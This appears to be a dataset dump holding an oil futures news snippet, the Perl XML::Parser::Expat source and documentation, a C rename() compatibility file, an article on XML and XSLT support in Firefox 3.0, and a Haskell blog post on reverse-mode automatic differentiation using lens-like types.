text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
23 January 2008 17:07 [Source: ICIS news]
LONDON (ICIS news)--NYMEX light sweet crude futures fell by more than two dollars on Wednesday to take the front month March contract close to the $87.00/bbl mark on the back of continued concern over the US economy, which was causing a major sell-off across the world’s stock and commodity markets.
?xml:namespace>
By 16:55 GMT, March NYMEX crude had hit a low of $87.20/bbl, a loss of $2.01/bbl from the Tuesday close of $89.21/bbl, before recovering to around $87.45/bbl.
At the same time, March Brent crude on ICE Futures was trading around $87.15/bbl, having earlier hit a low of $86.72/bbl, a loss of $1.73 | http://www.icis.com/Articles/2008/01/23/9095231/nymex-crude-falls-over-2bbl-on-recession-fears.html | CC-MAIN-2014-42 | refinedweb | 131 | 76.01 |
package XML::Parser::Expat; require 5.004; use strict; use vars qw($VERSION @ISA %Handler_Setters %Encoding_Table @Encoding_Path $have_File_Spec); use Carp; require DynaLoader; @ISA = qw(DynaLoader); $ method and two names can be checked for absolute equality with the L<"eq_name"> method. =item * NoExpand * ErrorContext When this option is defined, errors are reported in context. The value of ErrorContext should be the number of lines to show on either side of the line in which the error occurred. =item * ParseParamEnt Unless standalone is set to "yes" in the XML declaration, setting this to a true value allows the external DTD to be read, and parameter entities to be parsed and expanded. =item * Base The base to use for relative pathnames or URLs. This can also be done by using the base method. =back =item setHandlers(TYPE, HANDLER [, TYPE, HANDLER [...]]): =over 4 =item * Start (Parser, Element [, Attr, Val [,...]]) This event is generated when an XML start tag is recognized. Parser is an XML::Parser::Expat instance. Element is the name of the XML element that is opened with the start tag. The Attr & Val pairs are generated for each attribute in the start tag. =item * End (Parser, Element). =item * Char (Parser,. =item * Proc (Parser, Target, Data) This event is generated when a processing instruction is recognized. =item * Comment (Parser, String) This event is generated when a comment is recognized. =item * CdataStart (Parser) This is called at the start of a CDATA section. =item * CdataEnd (Parser) This is called at the end of a CDATA section. =item * Default (Parser,. =item * Unparsed (Parser,. =item * Notation (Parser,. =item * ExternEnt (Parser,). =item * ExternEntFin (Parser) This is called after an external entity has been parsed. It allows applications to perform cleanup on actions performed in the above ExternEnt handler. =item * Entity (Parser,. =item * Element (Parser, Name, Model) The element handler is called when an element declaration is found. Name is the element name, and Model is the content model as an XML::Parser::ContentModel object. See L<"XML::Parser::ContentModel Methods"> for methods available for this class. =item * Attlist (Parser,. =item * Doctype (Parser,. =item * DoctypeFin (Parser) This handler is called after parsing of the DOCTYPE declaration has finished, including any internal or external DTD declarations. =item * XMLDecl (Parser, Version, Encoding, Standalone). =back =item namespace(name). =item eq_name(name1, name2) Return true if name1 and name2 are identical (i.e. same name and from the same namespace.) This is only meaningful if both names were obtained through the Start or End handlers from a single document, or through a call to the generate_ns_name method. =item generate_ns_name(name, namespace) Return a name, associated with a given namespace, good for using with the above 2 methods. The namespace argument should be the namespace URI, not a prefix. =item new_ns_prefixes When called from a start tag handler, returns namespace prefixes declared with this start tag. If called elsewere (or if there were no namespace prefixes declared), it returns an empty list. Setting of the default namespace is indicated with '#default' as a prefix. =item expand_ns_prefix(prefix) Return the uri to which the given prefix is currently bound. Returns undef if the prefix isn't currently bound. Use '#default' to find the current binding of the default namespace (if any). =item current_ns_prefixes Return a list of currently bound namespace prefixes. The order of the the prefixes in the list has no meaning. If the default namespace is currently bound, '#default' appears in the list. =item recognized_string. =item original_string Returns the verbatim string from the document that was recognized in order to call the current handler. The string is in the original document encoding. This method doesn't return a meaningful string inside declaration handlers. =item default_current. =item xpcroak(message) Concatenate onto the given message the current line number within the XML document plus the message implied by ErrorContext. Then croak with the formed message. =item xpcarp(message) Concatenate onto the given message the current line number within the XML document plus the message implied by ErrorContext. Then carp with the formed message. =item current_line Returns the line number of the current position of the parse. =item current_column Returns the column number of the current position of the parse. =item current_byte Returns the current position of the parse. =item base([NEWBASE]); Returns the current value of the base for resolving relative URIs. If NEWBASE is supplied, changes the base to that value. =item context Returns a list of element names that represent open elements, with the last one being the innermost. Inside start and end tag handlers, this will be the tag of the parent element. =item current_element Returns the name of the innermost currently opened element. Inside start or end handlers, returns the parent of the element associated with those tags. =item in_element(NAME) Returns true if NAME is equal to the name of the innermost currently opened element. If namespace processing is being used and you want to check against a name that may be in a namespace, then use the generate_ns_name method to create the NAME argument. =item within_element(NAME) Returns the number of times the given name appears in the context list. If namespace processing is being used and you want to check against a name that may be in a namespace, then use the generate_ns_name method to create the NAME argument. =item depth Returns the size of the context list. =item element_index Returns an integer that is the depth-first visit order of the current element. This will be zero outside of the root element. For example, this will return 1 when called from the start handler for the root element start tag. =item skip_until(INDEX). =item position_in_context(LINES) Returns a string that shows the current parse position. LINES should be an integer >= 0 that represents the number of lines on either side of the current parse line to place into the returned string. =item xml_escape(TEXT [, CHAR [, CHAR ...]]) Returns TEXT with markup characters turned into character entities. Any additional characters provided as arguments are also turned into character references where found in TEXT. =item parse (SOURCE). =item parsestring(XML_DOC_STRING). =item parsefile(FILENAME) Parses the XML document in the given file. Will die if parsestring or parsefile has been called previously for this instance. =item is_defaulted(ATTNAME) NO LONGER WORKS. To find out if an attribute is defaulted please use the specified_attr method. =item specified_attr. =item finish Unsets all handlers (including internal ones that set context), but expat continues parsing to the end of the document or until it finds an error. It should finish up a lot faster than with the handlers set. =item release. =back =head2 XML::Parser::ContentModel Methods). =over 4 =item isempty This method returns true if the object is "EMPTY", false otherwise. =item isany This method returns true if the object is "ANY", false otherwise. =item ismixed This method returns true if the object is "(#PCDATA)" or "(#PCDATA|...)*", false otherwise. =item isname This method returns if the object is an element name. =item ischoice This method returns true if the object is a choice of content particles. =item isseq This method returns true if the object is a sequence of content particles. =item quant This method returns undef or a string representing the quantifier ('?', '*', '+') associated with the model or particle. =item children This method returns undef or (for mixed, choice, and sequence types) an array of component content particles. There will always be at least one component for choices and sequences, but for a mixed content model of pure PCDATA, "(#PCDATA)", then an undef is returned. =back =head2: =over 4 =item parse_more(DATA) Feed expat more text to munch on. =item parse_done Tell expat that it's gotten the whole document. =back =head1 FUNCTIONS =over 4 =item XML::Parser::Expat::load_encoding(ENCODING) automaticly called by expat when it encounters an encoding it doesn't know about. Expat shouldn't call this twice for the same encoding name. The only reason users should use this function is to explicitly load an encoding not contained in the @Encoding_Path list. =back =head1 AUTHORS Larry Wall <F<larry@wall.org>> wrote version 1.0. Clark Cooper <F<coopercc@netheaven.com>> picked up support, changed the API for this version (2.x), provided documentation, and added some standard package features. =cut | http://opensource.apple.com/source/CPANInternal/CPANInternal-108/XML-Parser/Expat/Expat.pm | CC-MAIN-2016-30 | refinedweb | 1,372 | 58.69 |
/* rename.c -- BSD compatible directory function for System V Copyright (C) 1988,def HAVE_CONFIG_H #include "config.h" #endif #include <sys/types.h> #include <sys/stat.h> #include <errno.h> #ifndef STDC_HEADERS extern int errno; #endif /* Rename file FROM to file TO. Return 0 if successful, -1 if not. */ int rename (from, to) char *from; char *to; { struct stat from_stats; int pid, status; if (stat (from, &from_stats) == 0) { /* We don't check existence_error because the systems which need it have rename(). */ if (unlink (to) && errno != ENOENT) return -1; if ((from_stats.st_mode & S_IFMT) == S_IFDIR) { #ifdef MVDIR /* I don't think MVDIR ever gets defined, but I don't think it matters, because I don't think CVS ever calls rename() on directories. */ /* Need a setuid root process to link and unlink directories. */ pid = fork (); switch (pid) { case -1: /* Error. */ error (1, errno, "cannot fork"); case 0: /* Child. */ execl (MVDIR, "mvdir", from, to, (char *) 0); error (255, errno, "cannot run `%s'", MVDIR); default: /* Parent. */ while (wait (&status) != pid) /* Do nothing. */ ; errno = 0; /* mvdir printed the system error message. */ return status != 0 ? -1 : 0; } #else /* no MVDIR */ error (1, 0, "internal error: cannot move directories"); #endif /* no MVDIR */ } else { /* We don't check existence_error because the systems which need it have rename(). */ if (link (from, to) == 0 && (unlink (from) == 0 || errno == ENOENT)) return 0; } } return -1; } | http://opensource.apple.com/source/cvs_wrapped/cvs_wrapped-15/cvs_wrapped/lib/rename.c | CC-MAIN-2015-11 | refinedweb | 222 | 68.87 |
Micah Dubinko
Micah Dubinko served as an editor and author of the XForms 1.0 W3C specification, where he participated in the XForms effort since September 1999, nine months before the official Working Group was chartered. Micah received a CompTIA CDIA (Certified Document Imaging Architech) certification in January 2001 and an InfoWorld Innovator award in 2004. He is the author of O'Reilly XForms Essentials, available online at. Currently, Micah works for Yahoo! in California as a Senior Research Developer.
Articles by this author:
Is XML 2.0 Under Development?
In Micah Dubinko's return to the XML Annoyances banner, he speculates as to whether the W3C is already considering whether to start work on XML 2.0. Read this piece and decide for yourself.
[Jan. 10, 2007]
Cracks in the Foundation
Micah Dubinko takes aim at the legion of annoyances caused by XML namespaces.
[Nov. 8, 2006]
The Power of No
In his latest XML Annoyances column Micah Dubinko examines a common force behind the good and bad aspects of XML.
[Feb. 1, 2006]
XML 2005: Tipping Sacred Cows
In his latest XML Annoyances column, Micah Dubinko reports from last week's XML 2005 conference in Atlanta.
[Nov. 23, 2005]
Microformats and Web 2.0]
The]
Top 10 XForms Engines
Micah Dubinko, one of the gurus of XForms, offers a rundown on the state of XForms engines for 2005.
[Feb. 9, 2005]
XForms and Microsoft InfoPath
Micah Dubinko, author of
XForms Essentials
, compares W3C XForms and Microsoft InfoPath, the data gathering technology shipping with Microsoft Office 2003.
[Oct. 29, 2003]
Ten Favorite XForms Engines
The author of O'Reilly's
XForms Essentials
describes ten software packages that implement the W3C's XForms specification, seen as the XML-friendly successor to HTML forms.
[Sep. 10, 2003]
A Hyperlink Offering
Prompted by recent debate over XHTML 2.0's invention of HLink, Achilles and the tortoise meet to discuss the use of linking in W3C specifications.
[Sep. 25, 2002]
What Are XForms
HTML forms have long been a weak link in web interfaces -- now XML comes to the rescue with XForms, the W3C's new web forms technology. Update: 9/11/2002
[Sep. 11, 2002]
What's Next for HTML?
Micah Dubinko examines upcoming developments in the HTML family, including XHTML 2.0, XML Events and XFrames.
[Sep. 4, 2002]
Interactive Web Services with XForms
The W3C's new XForms technology can be used to attach user interfaces to web services, making efficient use of existing infrastructure.
[Jan. 16, 2002]
Sponsored By:
|
Our Mission
|
|
Advertise With Us
|
|
Submissions Guidelines
Copyright © 2008 O'Reilly Media, Inc. | (707) 827-7000 / (800) 998-9938 | http://www.xml.com/pub/au/115 | crawl-001 | refinedweb | 440 | 55.74 |
What would you like to do?
Do congressman pay taxes?
Yes, they are subject to the same tax code.
+ 1 other found this useful
Was this answer useful?
Thanks for the feedback!
What are the chances you would ever get back together to record an eighth album?View Full Interview
What does a congressman do?
A Congressman or woman's main job is to make laws. They make speeches to the group, debate, and vote. In certain circumstances they have other powers, like declaring war a…nd impeachment.
What do the congressman do?
Although "congressman" may refer to any member of Congress, it often refers to a member of the House of Representatives, the members of the Senate being called senators. I…n either case, the congressman represents his district or state in the whichever house he belongs to. The purpose of the house is to make laws ( including changing laws already in effect.). Therefore the congressman proposes and votes on bills which become law if the Congress passes them and the President signs them. In order to decide which laws may be needed and how to vote, the Congressman may hold and attend hearing which call witnesses to be questioned . He or she may also make speeches , read and send out letters and meet with other congressmen in hopes of influencing their votes. He also reads his letters and meets with people who want Congress to act on certain issues. He is also likely to be always campaigning for reelection by making his record as appealing as possible to voters in his district. He has a staff to help him and has to manage his staff.
Who pays your Congressman?
Pay for congressmen comes from two sources: 1. Pay, perks and benefits for congressmen are paid by the US Govt, using money paid by taxpayers. 2. Bribes, kickbacks, Under …the table and off-the-record deals, selling senate seats, book buying package deals, inflated pay for one-time speeches at events, and gifts given to congressmen in exchange for favorable behavior in congress are opportunities for a congressmen to hide millions, and many times tens of millions of dollars in offshore accounts, untaxable of course, in a period of a just a few years.
In a 401k when you eventually pay taxes which taxes do you pay?
Distributions from your 401K after you reach your retirement age the taxable amount will be subject to federal income tax at your marginal tax rate and may be subject to some …state income tax.
_11<<_12<<.
WHO is your congressman?
Chino
When do you pay the taxes if you tax out money from a 401k?
You can have some income tax withheld from the distribution amount are you can choose to make some quartely estimated tax payments or you can wait until you file your income t…ax in the next year after the year that you receive the distribution amount by the due of your income tax for the previous year return and pay the full amount of taxes at that time. A calender year taxpayer the due date for filing and paying any amount owed would be April 15 of the next year
Do you pay taxes on income tax return?
I assume that this question is about an income tax refund, and not about an income tax return (which is the form you file with income tax authorities every year, along with an…y income taxes you still owe.) A Federal income tax refund is not taxable income (for state or Federal purposes) in the year a taxpayer receives it. A state income tax refund for a previous tax year, however, may be another story. It will be Federal taxable income in the year in which the taxpayer receives the refund, if he itemized deductions on the previous year's Federal income tax return. Suppose a taxpayer files his 2010 Form 1040, and itemizes his deductions. Following the instructions for the 1040, he deducts $500 withheld as state income tax (shown on his W-2) in computing his 2010 Federal taxable income. He then prepares his state income tax return and discovers that he owes only $435 in state income tax, and is due a refund of $65 (the difference between the $500 withheld and his actual liability of $435). His actual state tax liability was only $435, but he had deducted $500 from his 2010 Federal taxable income, so when he gets the $65 refund in 2011, he must include it in 2011 income for Federal income tax purposes to make up the difference. However, if the state refund was for a tax year for which the taxpayer did not itemize deductions on his Federal tax refund (i.e., he took the standard deduction), it is not taxable income to him.
Why pay taxes?
Because someone has to pay for the roads and social programs. If you don't want to pay for this, vote for politicians that want to eliminate taxes and make everything pr…ivate.
A congressman does not?
* serve for life * (nova net)
Answered
Why do you have to pay taxes?
We have to pay taxes because the government needs to pay for its various functions.
Answered
Why pay tax?
WE PAY TAX TO THE GOVERNMENT SO THE GOVERNMENT CAN USE THE MONEY FOR BUILDINGS, PUBLIC SERVICES, SCHOOLS AND NEED. WE PAY THE MONEY TO THE.............................….......................................
Answered
If you don't pay taxes will you get a tax refund?
no not at all alternative view A tax refund is absolutely dependent on if more money was paid in (through payroll withholding or estimated payments ever quarter - …as required) compared to what the return shows as actually being owed after all accounting. Many people get refunds (who have paid in and then owe no tax actually)....and many people have to pay additional tax. Also, many people with no tax liability and no payments in actually get benefits back, in the form of Credits and Federal support, (like the earned income credit, and others).
Answered
In Federal Laws
Do congressman pay for their postage?
No. Congressmen have the ability to use what is called a 'Free Frank' for official business. It really means that they sign the envelope, now days it is a pre-printed si…gnature where the stamp goes. | http://www.answers.com/Q/Do_congressman_pay_taxes | CC-MAIN-2016-36 | refinedweb | 1,055 | 69.92 |
With all the hundreds of XML processing tools out there, Web browsers are still where the action is—luckily for XML developers, the action never seems to slow down. Over the past few years I've written a series of articles (see Resources) about XML-related features in the developer favorite, the Firefox browser; I've covered Firefox 1.5 through 2.0. Recently Firefox moved up to version 3.0 with numerous overall improvements and a lot of great new developments for XML processing. Many of the improvements come from the upgrade of the core Web processing engine, Gecko, from version 1.8.1 to 1.9.
XML fundamentals in version 3.0
The XML space includes a huge stack of technologies, but it still all begins with the parser; Firefox 3 introduces one huge improvement to basic XML parsing. In the past on Mozilla browsers, parsing an XML document was synchronous, blocking all operations on the document until it was fully loaded. Contrast this to HTML parsing which has always been asynchronous so that parts of the document become available as they're parsed. To the user, this meant he starts to see how a Web page shaped up before the browser had completely processed the page; on the other hand, with XML documents the user saw nothing at all until it was completely parsed. This was a usability problem that served as an unfortunate deterrent for processing large XML documents.
In Firefox 3.0, construction of the XML content model is incremental, much as it is for HTML. This will make a big difference for practical use of XML on the Web. There are some exceptions—most notably that XSLT is not processed incrementally. In theory, you might apply a subset of XSLT incrementally, using a restricted subset of XPath, but doing so is significant effort in itself and lies beyond the scope of Firefox 3.0.
One improvement I had hoped for in Firefox 3.0 is xml:id support. There was some
controversy as to whether to support this, but a patch is available with a good
chance that it will become available in a future release. As a general note, the only means Firefox JavaScript provides to use
getElementById on XML documents is the internal DTD subset (no external subset, and no xml:id). If you really need xml:id use XPath from JavaScript to query for attributes in the XML namespace and "id" local name.
Another hoped-for core improvement that didn't make it is the ability for the user to request that the browser loads the external DTD subset. Again it looks as if a patch is ready but that there just weren't enough available developer resources to work it through the Q&A process to get it into the Firefox 3.0 release.. Firefox 3.0 implements a selection of extensions within a selection of modules, as listed:
- Common: Firefox 3.0 implements the basic set of general-purpose functions:
exsl:node-setallows you to turn result tree fragments into node-sets so that you can apply XPath on them.
exsl:object-typeis an introspection tool to report the type of an object such as string, node set, number, or boolean.
- Sets: Firefox 3.0 implements some useful extensions for working with node sets:
set:differencecomputes the difference between two sets, returning a node-set whose nodes are in one of the arguments but not the other.
set:distinctexamines a node set for nodes with the same string value and removes all but one instance of each.
set:intersectioncomputes the intersection if two sets, returning a node-set whose nodes are in both.
set:has-same-nodedetermines whether two node sets have any nodes in common (such as whether they share the actual same node and not just different nodes with the same string value, as with the XPath
=operator).
set:leadingreturns the nodes in one node-set that come before the first node in the other node-set, in document order.
set:trailingreturns the nodes in one node-set that come after the first node in the other node-set, in document order.
- Strings: Firefox 3.0 implements some useful extensions for working with strings:
str:concatreturns a string concatenating the string values of each node in a set (compare to the built-in
concatfunction which concatenates a fixed sequence of expressions).
str:splituses a pattern to split a string into a sequence of substrings (represented in a node set constructed at run time).
str:tokenizeuses a set of single-character tokens to split a string into a sequence of substrings (represented in a node set constructed at run time).
- Math: Firefox 3.0 implements some functions that make it easier to grab smallest and largest numerical quantities from the content of node sets:
math:maxreturns the highest numerical value of content within a given node set.
math:minreturns the lowest numerical value of content within a given node set.
math:highestreturns the node set whose content has the highest numerical value.
math:lowestreturns the node set whose content has the lowest numerical value.
- Regular expressions: Firefox 3.0 brings the power of regular expressions to XSLT:
regexp:matchmatches a regular expression pattern against a string and returns the matching substrings as a node set constructed at run time.
regexp:testchecks whether a string entirely matches a regular expression pattern.
regexp:replacereplaces substrings that match a regular expression pattern.
To get you started using EXSLT in your own transforms, I've constructed an example that exercises a good number of the functions implemented in Firefox 3.0. One of the best uses I've found for XSLT in the browser is to deliver reports against semi-structured data. You point the user to the XML file which contains a processing instruction to apply an XSLT transform. In such situations you can often dictate the required browser version so you don't have to worry as much about cross-browser compatibility. In addition you offload a lot of work from the server to each user's computer. Listing 1 (employees.xml) is an employee information file against which I'll present a report in Firefox 3.0.
Listing 1. Employee information file employees.xml
Notice the
xml-stylesheet processing instruction at the top which instructs the browser to use XSLT. Listing 2 (employees.xsl) is a transform to generate a report from Listing 1.
Listing 2. Transform to generate a report from the employee information file (employees.xsl)
I've heavily commented the code, highlighting where I use EXSLT, as well as other useful notes. The generated output references a CSS stylesheet, mostly as a demonstration of this pattern. Listing 3 (employees.css) is the CSS.
Listing 3. Presentation stylesheet for the report generate from the employee information file (employees.css)
Load Listing 1 into Firefox 3.0 to get the display in Figure 1.
Figure 1. Firefox 3.0 display of the report generated using Listings 1-3
In addition to the core-parsing improvements and EXSLT, Firefox 3.0 includes some fixes for compliance when working with XML documents with namespaces. The
DOMAttrModified event now properly handles attributes in a namespace and the JavaScript DOM method
getElementsByTagName() now works correctly on sub-trees that have elements with namespace prefixes in their tag names. There are many CSS and JavaScript fixes which will make life easier for XML developers.
For users of Scalable Vector Graphics (SVG), everyone's favorite XML showpiece, Firefox 3.0 offers even more goodies. It now supports patterns and masks which give you more options for rich effects; all SVG 1.1 filters are supported. You can now apply SVG transforms to any old Web browser object so that for example you might decide to rotate an IFRAME by 45 degrees, a trick that would usually require the Canvas facility. The Mozilla team has filled out SVG DOM support and along the way, squashed a lot of bugs.
Some will comment that XML has not had the expected success on the Web, but there is certainly a lot you can already accomplish with XML in browsers and thanks to continuing development in Web browsers, more and more becomes possible each year. Firefox 3.0 is an important milestone with its core performance improvements for XML processing, as well as the enhancements to XSLT, DOM, and SVG. You can't go wrong trying out these new capabilities. Even if you can't put all the bits to use right away because of cross-browser requirements, you'll be prepared for the future as the state of the art continues to advance in Web applications.
Information about download methods
Learn
- Firefox 3 for developers: Review the updated developer features for Firefox 3.0 and learn about the major improvements.
- For more details on the key fixes see the relevant bug entries:
- 18333 – XML Content Sink should be incremental
- 365801 – expose EXSLT functions to DOM Level 3 XPath API (documentInstance.evaluate)
- 362391 – DOMAttrModified doesn't handle namespaced attributes properly
- 206053 – document.getElementsByTagName('tagname') with XML document wrongly includes elements with namespace prefix in the tag name
- 22942 (entities) – Load external DTDs (entity/entities) (local and remote) if a pref is set
- 275196 – xml:id support
- xml:id standards page (developerWorks, April 2007): Find out more about xml:id and how to give unique identifiers to elements in XML documents.
- Extensible Stylesheet Language Transformations (XSLT) standards page (developerWorks, April 2007: Find out more about XSLT and EXSLT and how to transform XML documents to different forms.
- xml:id support: Keep track of progress, and if need be, use XPath through JavaScript to query for attributes in the XML namespace and "id" local name.
- SVG improvements in Firefox 3: Check out the improved support for SVG in this convenient list of newly added features.
- Check out earlier articles on Firefox and XML (developerWorks, Uche Ogbuji):
- XML in Firefox 1.5, Part 1: Overview of XML features (March 2006)
- XML in Firefox 1.5, Part 2: Basic XML processing (March 2006)
- XML in Firefox 1.5, Part 3: JavaScript meets XML in Firefox (August 2006)
- Firefox 2.0 and XML (October 2007)
- Multi-pass XSLT (developerWorks, Uche Ogbuji, September 2002) and Counting words in XML documents (developerWorks, Uche Ogbuji, September 2005) : Discover some XSLT techniques that become available with the addition of an EXSLT subset in Mozilla. For more on EXSLT overall, see "EXSLT by example" (developerWorks, Uche Ogbuji, February 2003).
-
- Firefox: Get the Mozilla-based Web browser that offers standards compliance, performance, security, and solid XML features.
- its successor Amara 2; Weblog Copia. | http://www.ibm.com/developerworks/library/x-think41/ | crawl-002 | refinedweb | 1,774 | 54.02 |
I read the announcement of VSoup and some enthousiastic people saying
it was much faster than Souper. So I decided to give it a trie. Since
I never trust new feutures/programs, I decided to test VSoup on getting
my news. I put the VSoup command in the place of the souper command in
my getting-news-script. I made a connection with my provider and ran
the changed script. Nothing happened. Okay, my window opened, but my
script stopped. I couldn't exit the script. Not with CTRL-Break or
CTRL-C, not even with closing the window. It just didn't close. And my
system started acting slower. I had to restart my system to get rid of
the script-window. So I decided to make a small test script to get only
two newsgroups. This is what my script looks like:
@echo off
f:
cd \yarn\temp
vsoup -m -N f:\yarn\home\testrc
if not exist *.msg goto einde
if not exist areas goto einde
copy 00000??.MSG *.OLD
copy AREAS AREAS.OLD
zip -kjm soup.zip areas *.msg
import soup.zip.
And a request to Hardy Griech: It might be useful to alow a CTRL-Break
or CTRL-C to exit VSoup, so please can you implement it?
Thanks,
Ronald
-- Ronald Redmeijer Leiden, The Netherlands redm@xs4all.nl
***** My best friend convinced me to buy his computer. ***** ***** He now has more time seeing my girl-friend. ***** | http://www.vex.net/yarn/list/199609/0119.html | crawl-001 | refinedweb | 241 | 86.2 |
Neural Networks with Weighty Lenses (DiOptics?)
I wrote a while back how you can make a pretty nice DSL for reverse mode differentiation based on the same type as Lens. I’d heard some interesting rumblings on the internet around these ideas and so was revisiting them.
type Lens s t a b = s -> (a, b -> t) type AD x dx y dy = x -> (y, dy -> dx)
Composition is defined identically for reverse mode just as it is for lens.
The forward computation shares info with the backwards differential propagation, which corresponds to a transposed Jacobian
After chewing on it a while, I realized this really isn’t that exotic. How it works is that you store the reverse mode computation graph, and all necessary saved data from the forward pass in the closure of the
(dy -> dx). I also have a suspicion that if you defunctionalized this construction, you’d get the Wengert tape formulation of reverse mode ad.
Second, Lens is just a nice structure for bidirectional computation, with one forward pass and one backward pass which may or may not be getting/setting. There are other examples for using it like this.
It is also pretty similar to the standard “dual number” form
type FAD x dx y dy = (x,dx)->(y,dy) for forward mode AD. We can bring the two closer by a CPS/Yoneda transformation and then some rearrangement.
x -> (y, dy -> dx) ==> x -> (y, forall s. (dx -> s) -> (dy -> s)) ==> forall s. (x, dx -> s) -> (y, dx -> s)
and meet it in the middle with
(x,dx) -> (y,dy) ==> forall s. (x, s -> dx) -> (y, s -> dy)
I ended the previous post somewhat unsatisfied by how ungainly writing that neural network example was, and I called for Conal Elliot’s compiling to categories plugin as a possible solution. The trouble is piping the weights all over the place. This piping is very frustrating in point-free form, especially when you know it’d be so trivial pointful. While the inputs and outputs of layers of the network compose nicely (you no longer need to know about the internal computations), the weights do not. As we get more and more layers, we get more and more weights. The weights are in some sense not as compositional as the inputs and outputs of the layers, or compose in a different way that you need to maintain access to.
I thought of a very slight conceptual twist that may help.
The idea is we keep the weights out to the side in their own little type parameter slots. Then we define composition such that it composes input/outputs while tupling the weights. Basically we throw the repetitive complexity appearing in piping the weights around into the definition of composition itself.
These operations are easily seen as 2 dimensional diagrams.
Three layers composed, exposing the weights from all layers
The 2-D arrow things can be built out of the 1-d arrows of the original basic AD lens by bending the weights up and down. Ultimately they are describing the same thing
Here’s the core reverse lens ad combinators
import Control.Arrow ((***)) type Lens'' a b = a -> (b, b -> a) comp :: (b -> (c, (c -> b))) -> (a -> (b, (b -> a))) -> (a -> (c, (c -> a))) comp f g x = let (b, dg) = g x in let (c, df) = f b in (c, dg . df) id' :: Lens'' a a id' x = (x, id) relu' :: (Ord a, Num a) => Lens'' a a relu' = \x -> (frelu x, brelu x) where frelu x | x > 0 = x | otherwise = 0 brelu x dy | x > 0 = dy | otherwise = 0 add' :: Num a => Lens'' (a,a) a add' = \(x,y) -> (x + y, \ds -> (ds, ds)) dup' :: Num a => Lens'' a (a,a) dup' = \x -> ((x,x), \(dx,dy) -> dx + dy) sub' :: Num a => Lens'' (a,a) a sub' = \(x,y) -> (x - y, \ds -> (ds, -ds)) mul' :: Num a => Lens'' (a,a) a mul' = \(x,y) -> (x * y, \dz -> (dz * y, x * dz)) recip' :: Fractional a => Lens'' a a recip' = \x-> (recip x, \ds -> - ds / (x * x)) div' :: Fractional a => Lens'' (a,a) a div' = (\(x,y) -> (x / y, \d -> (d/y,-x*d/(y * y)))) sin' :: Floating a => Lens'' a a sin' = \x -> (sin x, \dx -> dx * (cos x)) cos' :: Floating a => Lens'' a a cos' = \x -> (cos x, \dx -> -dx * (sin x)) pow' :: Num a => Integer -> Lens'' a a pow' n = \x -> (x ^ n, \dx -> (fromInteger n) * dx * x ^ (n-1)) --cmul :: Num a => a -> Lens' a a --cmul c = lens (* c) (\x -> \dx -> c * dx) exp' :: Floating a => Lens'' a a exp' = \x -> let ex = exp x in (ex, \dx -> dx * ex) fst' :: Num b => Lens'' (a,b) a fst' = (\(a,b) -> (a, \ds -> (ds, 0))) snd' :: Num a => Lens'' (a,b) b snd' = (\(a,b) -> (b, \ds -> (0, ds))) -- some monoidal combinators swap' :: Lens'' (a,b) (b,a) swap' = (\(a,b) -> ((b,a), \(db,da) -> (da, db))) assoc' :: Lens'' ((a,b),c) (a,(b,c)) assoc' = \((a,b),c) -> ((a,(b,c)), \(da,(db,dc)) -> ((da,db),dc)) assoc'' :: Lens'' (a,(b,c)) ((a,b),c) assoc'' = \(a,(b,c)) -> (((a,b),c), \((da,db),dc)-> (da,(db,dc))) par' :: Lens'' a b -> Lens'' c d -> Lens'' (a,c) (b,d) par' l1 l2 = l3 where l3 (a,c) = let (b , j1) = l1 a in let (d, j2) = l2 c in ((b,d) , j1 *** j2) first' :: Lens'' a b -> Lens'' (a, c) (b, c) first' l = par' l id' second' :: Lens'' a b -> Lens'' (c, a) (c, b) second' l = par' id' l labsorb :: Lens'' ((),a) a labsorb (_,a) = (a, \a' -> ((),a')) labsorb' :: Lens'' a ((),a) labsorb' a = (((),a), \(_,a') -> a') rabsorb :: Lens'' (a,()) a rabsorb = comp labsorb swap'
And here are the two dimensional combinators. I tried to write them point-free in terms of the combinators above to demonstrate that there is no monkey business going on. We
type WAD' w w' a b = Lens'' (w,a) (w',b) type WAD'' w a b = WAD' w () a b -- terminate the weights for a closed network {- For any monoidal category we can construct this composition? -} -- horizontal composition hcompose :: forall w w' w'' w''' a b c. WAD' w' w'' b c -> WAD' w w''' a b -> WAD' (w',w) (w'',w''') a c hcompose f g = comp f' g' where f' :: Lens'' ((w',r),b) ((w'',r),c) f' = (first' swap') `comp` assoc'' `comp` (par' id' f) `comp` assoc' `comp` (first' swap') g' :: Lens'' ((r,w),a) ((r,w'''),b) g' = assoc'' `comp` (par' id' g) `comp` assoc' rotate :: WAD' w w' a b -> WAD' a b w w' rotate f = swap' `comp` f `comp` swap' -- vertical composition of weights vcompose :: WAD' w' w'' c d -> WAD' w w' a b -> WAD' w w'' (c, a) (d, b) vcompose f g = rotate (hcompose (rotate f) (rotate g) ) -- a double par. diagpar :: forall w w' a b w'' w''' c d. WAD' w w' a b -> WAD' w'' w''' c d -> WAD' (w,w'') (w',w''') (a, c) (b, d) diagpar f g = t' `comp` (par' f g) `comp` t where t :: Lens'' ((w,w''),(a,c)) ((w,a), (w'',c)) -- yikes. just rearrangements. t = assoc'' `comp` (second' ((second' swap') `comp` assoc' `comp` swap')) `comp` assoc' t' :: Lens'' ((w',b), (w''',d)) ((w',w'''),(b,d)) -- the tranpose of t t' = assoc'' `comp` (second' ( swap' `comp` assoc'' `comp` (second' swap'))) `comp` assoc' id''' :: WAD' () () a a id''' = id' -- rotate:: WAD' w a a w -- rotate = swap' liftIO :: Lens'' a b -> WAD' w w a b liftIO = second' liftW :: Lens'' w w' -> WAD' w w' a a liftW = first' wassoc' = liftW assoc' wassoc'' = liftW assoc'' labsorb'' :: WAD' ((),w) w a a labsorb'' = first' labsorb labsorb''' :: WAD' w ((),w) a a labsorb''' = first' labsorb' wswap' :: WAD' (w,w') (w',w) a a wswap' = first' swap' -- and so on we can lift all combinators
I wonder if this is actually nice?
I asked around and it seems like this idea may be what davidad is talking about when he refers to dioptics
Perhaps this will initiate a convo.
Edit: He confirms that what I’m doing appears to be a dioptic. Also he gave a better link
He is up to some interesting diagrams
Bits and Bobbles
- Does this actually work or help make things any better?
- Recurrent neural nets flip my intended role of weights and inputs.
- Do conv-nets naturally require higher dimensional diagrams?
